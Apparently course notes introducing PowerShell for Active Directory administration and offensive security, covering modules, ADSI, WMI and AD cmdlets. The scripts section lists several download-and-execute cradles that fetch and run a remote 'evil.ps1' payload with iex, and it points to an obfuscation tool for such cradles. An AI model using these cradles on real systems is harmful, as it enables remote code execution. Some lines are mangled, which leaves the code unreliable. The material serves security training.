2.1 - Introduction to PowerShell

What is PowerShell?

What is PowerShell? - PowerShellMicrosoftLearn

https://learn.microsoft.com/en-us/powershell/scripting/overview?view=powershell-7.4

PowerShell is a powerful scripting and automation platform developed by Microsoft. It combines the flexibility of a scripting language with the functionality of a command-line shell, enabling users to manage systems, automate repetitive tasks, and access system components programmatically.

• Cross-Platform: Available on Windows, macOS, and Linux.

• Object-Oriented: Operates with objects instead of plain text, allowing for more precise and flexible scripting.

• Integration: Seamlessly integrates with .NET and other Microsoft technologies.

• Use Cases: Ideal for administrative tasks, system configuration, and cybersecurity operations.

https://pbs.twimg.com/media/Duju2mhX4AE6a0u.jpg:large

The Most Helpful PowerShell Cheat Sheet You’ll Ever FindStationX

https://www.stationx.net/powershell-cheat-sheet/

Core Components

Scripts

Scripts: .ps1 files containing PowerShell commands for automating tasks.

• A script to list all running services:

  Get-Service | Where-Object { $_.Status -eq "Running" }

• Load a PowerShell script using dot sourcing:

C:\AD\Tools|PowerView.ps1

• Download execute cradle

iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1') sponse

$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1 ');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $re

PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

Check out Invoke-CradleCrafter:

GitHub - danielbohannon/Invoke-CradleCrafter: PowerShell Remote Download Cradle Generator & ObfuscatorGitHub

https://github.com/danielbohannon/Invoke-CradleCrafter

• Load a PowerShell script using dot sourcing:

C:\AD\Tools|PowerView.ps1

Modules

Modules: Packages of reusable cmdlets, scripts, and resources.

• Popular modules include:

  • ActiveDirectory: Manages AD objects.

  • Pester: For testing scripts.

  • PSReadLine: Enhances the shell experience.

• Install with:

  Install-Module -Name ModuleName

• A module (or a script) can be imported using:

Import-Module C:\AD\Tools|AdModule-master\ActiveDirectory\ActiveDirectory.psd1

• All the commands into a module can be listed using:

Get-Command -Module <modulename>

PowerShell for Active Directory (AD)

PowerShell is a primary tool for managing AD environments.

ADSI (Active Directory Service Interfaces)

ADSI is a set of COM interfaces for interacting with directory services like Active Directory. It enables querying, modifying, and managing directory objects without requiring additional modules. PowerShell can use ADSI for lightweight operations, especially on systems without the AD module. ADSI uses LDAP paths to locate objects and execute changes. It is versatile but requires knowledge of directory structure and object attributes. Common use cases include user management, password resets, and retrieving directory information. ADSI is powerful for automation in legacy environments or restrictive setups.

.NET Classes for AD

.NET classes in PowerShell provide direct access to Active Directory operations via the .NET Framework. Key classes like DirectorySearcher and DirectoryEntry allow querying and managing directory objects. These classes offer fine-grained control over AD queries and modifications. Unlike cmdlets, .NET classes require coding expertise but are highly flexible. They are useful for advanced scenarios like custom searches or handling large datasets. .NET integration with PowerShell allows developers to bypass module dependencies. This approach is ideal for scripting in environments with strict constraints.

Native Executables

Native executables like dsquery, net user, and nltest interact directly with Active Directory without PowerShell. They are pre-installed on Windows systems, making them a reliable fallback. These tools are useful for quick queries, user enumeration, or domain configuration checks. For example, dsquery retrieves specific AD objects, while net user checks group memberships. Native executables can be used in combination with PowerShell for hybrid scripts. They are particularly valuable in environments where PowerShell use is restricted. However, they are less script-friendly compared to PowerShell cmdlets or .NET classes.

4. WMI (Windows Management Instrumentation) with PowerShell

WMI is a Windows management framework for accessing system and network information, including Active Directory. PowerShell leverages WMI to query or modify system and directory data remotely. Common uses include querying system information, AD containers, or domain-related data. WMI supports cross-system communication, making it useful for remote administration. It uses namespaces and classes like DS_Container to access directory objects. WMI is efficient for real-time monitoring and automation tasks. It is especially valuable in environments where standard AD tools are unavailable.

5. Active Directory Module (AD Module)

The AD module is a PowerShell module providing cmdlets for seamless Active Directory management. It simplifies complex AD operations, such as querying users (Get-ADUser) or managing groups (Add-ADGroupMember). The module integrates tightly with the AD schema, ensuring compatibility and ease of use. It is ideal for administrators who prefer high-level commands over low-level scripting. Common administrative tasks, like resetting passwords or managing group policies, are easily automated. The AD module requires installation on systems that need to run AD-specific cmdlets. It is a go-to tool for modern AD management via PowerShell.

Common AD Tasks

• Querying AD Objects:

  Get-ADUser -Filter * -SearchBase "OU=IT,DC=example,DC=com"

• Modifying Users or Groups:

  New-ADUser -Name "John Doe" -SamAccountName "jdoe" -UserPrincipalName "jdoe@example.com"
  Add-ADGroupMember -Identity "IT_Group" -Members "jdoe"

Benefits of PowerShell with AD

1. Automation of repetitive administrative tasks.

2. Bulk modifications (e.g., importing users from CSV).

3. Real-time monitoring and auditing through queries.